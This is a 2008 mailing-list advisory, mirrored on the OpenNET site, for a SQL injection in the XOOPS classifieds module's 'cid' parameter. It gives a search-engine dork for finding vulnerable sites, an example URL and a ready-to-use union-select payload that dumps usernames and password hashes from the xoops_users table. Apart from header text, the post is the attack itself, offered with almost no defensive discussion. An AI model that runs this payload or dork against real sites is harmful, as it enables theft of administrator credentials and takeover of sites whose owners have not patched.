The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


XOOPS Module classifieds SQL Injection(cid)


<< Previous INDEX Search src / Print Next >> 
Date: 19 Feb 2008 20:26:58 -0000
From: [email protected]
To: [email protected]
Subject: XOOPS Module classifieds SQL Injection(cid)
X-Virus-Scanned: antivirus-gw at tyumen.ru

###############################################################
# 
#   XOOPS Module classifieds SQL Injection(cid)
#
###############################################################
#
# AUTHOR : S@BUN 
#
# HOME 1 : http://www.milw0rm.com/author/1334
#   
# MA&#304;L : [email protected]
#        
################################################################
# 
#  DORK 1 : allinurl: cid"modules/classifieds/index.php?pa=Adsview"
# 
################################################################
   
  example

http://xxxx/modules/classifieds/index.php?pa=Adsview&cid=[exploit]

 EXPLOIT : 

-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0x3a,0x3a,concat(uname,0x3a,pass)/**/from+xoops_users/*where%20admin%20-1

################################################################
# S@BUN           i AM NOT HACKER      S@BUN 
################################################################

<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру